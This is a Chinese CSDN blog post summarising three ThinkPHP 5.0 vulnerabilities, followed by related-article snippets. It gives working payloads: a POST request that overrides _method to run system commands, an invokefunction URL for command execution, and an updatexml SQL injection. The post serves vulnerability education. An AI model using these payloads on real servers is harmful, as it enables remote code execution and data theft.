ThinkPHP框架漏洞

最新推荐文章于 2024-06-27 12:03:31 发布
最新推荐文章于 2024-06-27 12:03:31 发布
阅读量210 收藏
点赞数
文章标签: 网络安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qian_227/article/details/131378359
版权
文章探讨了ThinkPHP5.0版本存在的三个主要安全问题:一是通过POST请求中的_method参数覆盖导致的构造函数命令执行漏洞;二是因未开启强制路由,允许远程命令注入;三是服务器处理orderby参数时对数组缺乏过滤,可引发漏洞。这些问题都可能让攻击者执行任意代码,影响系统安全。
摘要由CSDN通过智能技术生成

介绍:ThinkPHP是一个开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。

{i}5.0命令执行漏洞

POST /index.php?s=captcha HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

在ThinkPHP5.0版本表单请求类型伪装中,通过$_POST['_method']来传递真实的请求方法,攻击者可以通过POST传递_method=__construct来对Request类的method方法进行覆盖。当攻击者将filter变量覆盖为system函数时即 可任意代码执行漏洞。

{ii}远程命令注入: 由于没有开启强制路由,未对路由的控制器进行过滤,导致远程命令执行。

payload:

http://xx.xx.xx.xx/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令参数

{iii}由于服务器处理order by的参数时,未对数组进行过滤,若传入的参数为数组,则会导致漏洞产生

payload:

index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

imp797.
关注
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1418
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
thinkphp漏洞总结
热门推荐
scu_hacker博客
01-19 1万+
目录 前言 一、远程代码执行漏洞 1.1 影响范围 1.2 漏洞详情 二、5.x远程命令注入 三、5.1.x SQL注入 前言 thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞 一、远程代码执行漏洞 1.1 影响范围 thinkphp&l...
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 8430
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5145
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
PHP框架漏洞
admin的博客
10-15 3027
来自XCTF的php_rce.(RCE就是远程入侵检测,包括代码注入和命令执行漏洞) 很奇特的一个页面。我们知道ThinkPHP V5是一个PHP框架,于是我们到github上寻找这个框架漏洞,这是一个很好的思路点,上github上找框架漏洞。 那这么多漏洞我们选择哪个呢?我们看到了熟悉的system和phpinfo这两条。system对我们很有用,后面哪个vars[1][]=命令。 例如我们执行: phpinfo()http://111.200.241.244:55994/?s...
ThinkPHP代码执行漏洞
Massimo__JAVA的博客
07-01 2079
特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发。
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 3052
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
thinkphp漏洞检测工具
06-06
2. **漏洞扫描**:运行工具后,它会自动遍历指定的URL,检查ThinkPHP框架中的常见漏洞。这个过程可能需要一些时间,因为工具会尝试各种可能的攻击向量。 3. **结果分析**:扫描完成后,工具会生成一份报告,列明...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
例如,提供的专题教程《ThinkPHP入门教程》、《thinkPHP模板操作技巧总结》等,都是为了帮助开发者更深入地理解和运用ThinkPHP框架,构建出更加安全、高效的应用。 总之,面对任意代码执行漏洞这样的安全挑战,...
thinkphp 一键漏洞检测
12-09
该工具适用于ThinkPHP框架的多个版本,从V3.2.0到V5.1.23,涵盖了ThinkPHP发展过程中的主要版本。这表明它具有广泛的适用性,能够帮助管理员或开发者快速检测并修复不同版本ThinkPHP框架安全问题。 在网络安全中...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP 2.x 任意代码执行漏洞
weixin_60329395的博客
10-10 1724
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:depr,paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
ThinkPHP框架常见漏洞的探讨
最新发布
sys333666999的博客
06-27 367
为了防范远程代码执行漏洞,开发者应加强对用户输入数据的验证和过滤,避免将用户输入直接拼接到代码或SQL语句中,同时及时更新框架版本,修复已知的安全漏洞。在ThinkPHP框架中,如果开发者对用户提交的数据未进行充分的过滤和转义,就可能导致XSS漏洞的产生。在ThinkPHP框架中,如果开发者对上传的文件未进行充分的验证和过滤,就可能导致恶意文件的上传和执行。为了防范文件上传漏洞,开发者应对上传的文件类型、大小和内容进行严格的限制和检查,避免接受不必要的文件类型。
ThinkPHP5 5.0.23 远程代码执行漏洞
Snowflake1997的博客
03-09 4416
关闭其它的docker环境 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 进入目录并启动 访问 index.php?s=captcha _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami ...
PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源
W小哥
05-06 291
csdn我的资源: 目录: 1-1 课程框架介绍 1-2 ThinkPHP3.2 信息泄露分析 1-3 ThinkPHP3.2 数据库操作内核分析 1-4 ThinkPHP3.2 UPDATE注入漏洞详解 1-5 ThinkPHP3.2 find注入漏洞讲解 1-6 ThinkPHP3.2 order注入漏洞讲解 1-7 ThinkPHP3.2 简单逻辑漏洞 2-1 ThinkPHP5.X 数据库操作内核分析 2-2 ThinkPHP5.0.9 sql注入分析 2-3 ThinkPHP5.0.15 upda
PHP常用框架漏洞
小小猪的博客
08-14 3071
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
ThinkPHP开发框架安全漏洞,超过4.5万家中文网站受影响
mozhe_的博客
12-27 403
据外媒ZDNet报道,近期有超过4.5万家中文网站被发现容易遭到来自黑客的攻击,而导致这一安全风险出现的根源竟然是一个ThinkPHP漏洞。 报道称,有多家网络安全公司在近期都发现了针对运行着基于ThinkPHP的Web应用程序的服务器的扫描活动。ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持Windows/Unix/Linux等服务器环境,以及MySql、PgSQL、...
thinkphp 需要注意的一些漏洞(可能已经修复,此处仅是学习)
houzhyan-博客
04-11 3663
部分内容摘自网络。看完之后受益匪浅,和大家分享 之前发过关于thinkphp的一个ip获取漏洞,官方木有反应 http://www.thinkphp.cn/bug/2756.html 于是就考虑到官方的关于web中的sql注入过滤的问题是否也是非常马虎。 看来几篇文章,发现确实这个thinkphp 框架写的不怎么样。对于安全问题视而不见。以下部分内容摘自网络以及本人测试 测试:下载thi
Thinkphp漏洞总结
qq_44640313的博客
11-02 605
ThinkPHP框架漏洞知识总结
ThinkPHP框架安全解析:从漏洞到防御
关于安全防御,Thinkphp框架提供了多种安全机制来防止漏洞的发生,例如输入验证、SQL注入防护、XSS攻击防御等。在开发过程中,遵循最佳实践,如正确过滤和转义用户输入,使用预编译的SQL语句,以及利用框架提供的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值